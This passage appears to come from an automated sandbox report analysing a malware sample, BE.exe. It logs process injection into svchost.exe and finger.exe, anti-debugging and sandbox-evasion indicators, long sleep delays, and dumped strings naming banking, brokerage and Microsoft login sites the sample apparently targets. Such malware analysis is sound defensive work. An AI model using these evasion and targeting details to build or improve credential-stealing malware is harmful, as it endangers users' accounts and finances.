Source: Binary string: wntdll.pdbUGP source: BE.exe, 00000000.00000003.2066153968.0000000003670000.00000004.00001000.00020000.00000000.sdmp, BE.exe, 00000000.00000003.2067199286.0000000003860000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2116156273.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2260716338.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2260716338.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2114386339.0000000003500000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000002.4524439951.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000003.2263992743.0000000002A97000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000002.4524439951.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000003.2260870045.0000000000811000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: BE.exe, 00000000.00000003.2066153968.0000000003670000.00000004.00001000.00020000.00000000.sdmp, BE.exe, 00000000.00000003.2067199286.0000000003860000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2116156273.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2260716338.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2260716338.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2114386339.0000000003500000.00000004.00000020.00020000.00000000.sdmp, finger.exe, finger.exe, 00000004.00000002.4524439951.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000003.2263992743.0000000002A97000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000002.4524439951.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000003.2260870045.0000000000811000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: finger.exe, 00000004.00000002.4525309723.000000000326C000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000004.00000002.4522971094.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000000.2329203520.0000000002E3C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2500853283.000000001422C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: finger.exe, 00000004.00000002.4525309723.000000000326C000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000004.00000002.4522971094.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000000.2329203520.0000000002E3C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2500853283.000000001422C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: firefox.pdb source: finger.exe, 00000004.00000003.2500796329.0000000007AFC000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: finger.pdbGCTL source: svchost.exe, 00000002.00000002.2260567408.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2260582343.0000000003212000.00000004.00000020.00020000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000003.00000002.4523226545.0000000001588000.00000004.00000020.00020000.00000000.sdmp
Source: BE.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: BE.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: BE.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: BE.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: BE.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_003842DE
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003A0A76 push ecx; ret 0_2_003A0A89
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041F8A2 push ecx; iretd 2_2_0041F8A9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041F949 pushfd ; retf 2_2_0041F95D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040E2DC push ss; ret 2_2_0040E2DD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402364 push edx; retf 2_2_00402367
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042F3F2 push eax; ret 2_2_0042F3F4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004023A4 pushfd ; retf 2_2_004023A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00403460 push eax; ret 2_2_00403462
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00414DD9 push ebx; ret 2_2_00414DED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00414DE3 push ebx; ret 2_2_00414DED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00414DF6 push ecx; ret 2_2_00414DFC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041FEE8 push esi; ret 2_2_0041FF35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041FF4D push esi; ret 2_2_0041FF35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041F75F pushad ; iretd 2_2_0041F760
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004077EF push esi; retf 2_2_004077F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0390225F pushad ; ret 2_2_039027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039027FA pushad ; ret 2_2_039027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039309AD push ecx; mov dword ptr [esp], ecx 2_2_039309B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0390283D push eax; iretd 2_2_03902858
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03901368 push eax; iretd 2_2_03901369
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C4225F pushad ; ret 4_2_02C427F9
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C427FA pushad ; ret 4_2_02C427F9
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C4283D push eax; iretd 4_2_02C42858
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C709AD push ecx; mov dword ptr [esp], ecx 4_2_02C709B6
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C41366 push eax; iretd 4_2_02C41369
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C47AAB push ecx; retf 4_2_02C47ABE
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_00420000 push ebp; retf 4_2_00420004
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_0043C2FC pushad ; iretd 4_2_0043C2FD
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_0042438C push esi; retf 4_2_0042438E
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_0043C43F push ecx; iretd 4_2_0043C446
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_0043C4E6 pushfd ; retf 4_2_0043C4FA
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_0039F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_0039F98E
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_00411C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00411C41
Source: C:\Users\user\Desktop\BE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\BE.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0397096E rdtsc 2_2_0397096E
Source: C:\Windows\SysWOW64\finger.exe Window / User API: threadDelayed 9835 Jump to behavior
Source: C:\Users\user\Desktop\BE.exe API coverage: 3.9 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 1.3 %
Source: C:\Windows\SysWOW64\finger.exe API coverage: 2.7 %
Source: C:\Windows\SysWOW64\finger.exe TID: 5140 Thread sleep count: 134 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe TID: 5140 Thread sleep time: -268000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe TID: 5140 Thread sleep count: 9835 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe TID: 5140 Thread sleep time: -19670000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe TID: 7100 Thread sleep time: -75000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe TID: 7100 Thread sleep count: 38 > 30 Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe TID: 7100 Thread sleep time: -57000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe TID: 7100 Thread sleep count: 40 > 30 Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe TID: 7100 Thread sleep time: -40000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\finger.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_003EDBBE
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003BC2A2 FindFirstFileExW, 0_2_003BC2A2
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003F68EE FindFirstFileW,FindClose, 0_2_003F68EE
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_003F698F
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_003ED076
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_003ED3A9
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_003F9642
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_003F979D
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_003F9B2B
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003F5C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_003F5C97
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_0043D0D0 FindFirstFileW,FindNextFileW,FindClose, 4_2_0043D0D0
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_003842DE
Source: -e04230_.4.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: -e04230_.4.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: -e04230_.4.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: -e04230_.4.dr Binary or memory string: discord.comVMware20,11696487552f
Source: -e04230_.4.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: -e04230_.4.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: -e04230_.4.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: -e04230_.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: -e04230_.4.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: -e04230_.4.dr Binary or memory string: global block list test formVMware20,11696487552
Source: -e04230_.4.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: -e04230_.4.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: -e04230_.4.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: finger.exe, 00000004.00000002.4522971094.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000002.4523387587.0000000001059000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: -e04230_.4.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: -e04230_.4.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: -e04230_.4.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: -e04230_.4.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: -e04230_.4.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: -e04230_.4.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: -e04230_.4.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: -e04230_.4.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: -e04230_.4.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: -e04230_.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: -e04230_.4.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: -e04230_.4.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: -e04230_.4.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: -e04230_.4.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: -e04230_.4.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: -e04230_.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: -e04230_.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: -e04230_.4.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0397096E rdtsc 2_2_0397096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418A63 LdrLoadDll, 2_2_00418A63
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003FEAA2 BlockInput, 0_2_003FEAA2
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_003B2622
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_003842DE
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003A4CE8 mov eax, dword ptr fs:[00000030h] 0_2_003A4CE8
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_00D73560 mov eax, dword ptr fs:[00000030h] 0_2_00D73560
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_00D73500 mov eax, dword ptr fs:[00000030h] 0_2_00D73500
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_00D71ED0 mov eax, dword ptr fs:[00000030h] 0_2_00D71ED0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03928397 mov eax, dword ptr fs:[00000030h] 2_2_03928397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03928397 mov eax, dword ptr fs:[00000030h] 2_2_03928397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03928397 mov eax, dword ptr fs:[00000030h] 2_2_03928397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h] 2_2_0392E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h] 2_2_0392E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h] 2_2_0392E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395438F mov eax, dword ptr fs:[00000030h] 2_2_0395438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395438F mov eax, dword ptr fs:[00000030h] 2_2_0395438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h] 2_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h] 2_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h] 2_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h] 2_2_039D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h] 2_2_039D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039EC3CD mov eax, dword ptr fs:[00000030h] 2_2_039EC3CD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h] 2_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h] 2_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h] 2_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h] 2_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B63C0 mov eax, dword ptr fs:[00000030h] 2_2_039B63C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039663FF mov eax, dword ptr fs:[00000030h] 2_2_039663FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392C310 mov ecx, dword ptr fs:[00000030h] 2_2_0392C310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h] 2_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A08324 mov ecx, dword ptr fs:[00000030h] 2_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h] 2_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h] 2_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03950310 mov ecx, dword ptr fs:[00000030h] 2_2_03950310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h] 2_2_0396A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h] 2_2_0396A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h] 2_2_0396A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h] 2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h] 2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h] 2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B035C mov ecx, dword ptr fs:[00000030h] 2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h] 2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h] 2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039FA352 mov eax, dword ptr fs:[00000030h] 2_2_039FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D8350 mov ecx, dword ptr fs:[00000030h] 2_2_039D8350
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D437C mov eax, dword ptr fs:[00000030h] 2_2_039D437C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A0634F mov eax, dword ptr fs:[00000030h] 2_2_03A0634F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h] 2_2_0396E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h] 2_2_0396E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h] 2_2_039B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h] 2_2_039B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h] 2_2_039B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h] 2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h] 2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h] 2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h] 2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h] 2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0393A2C3
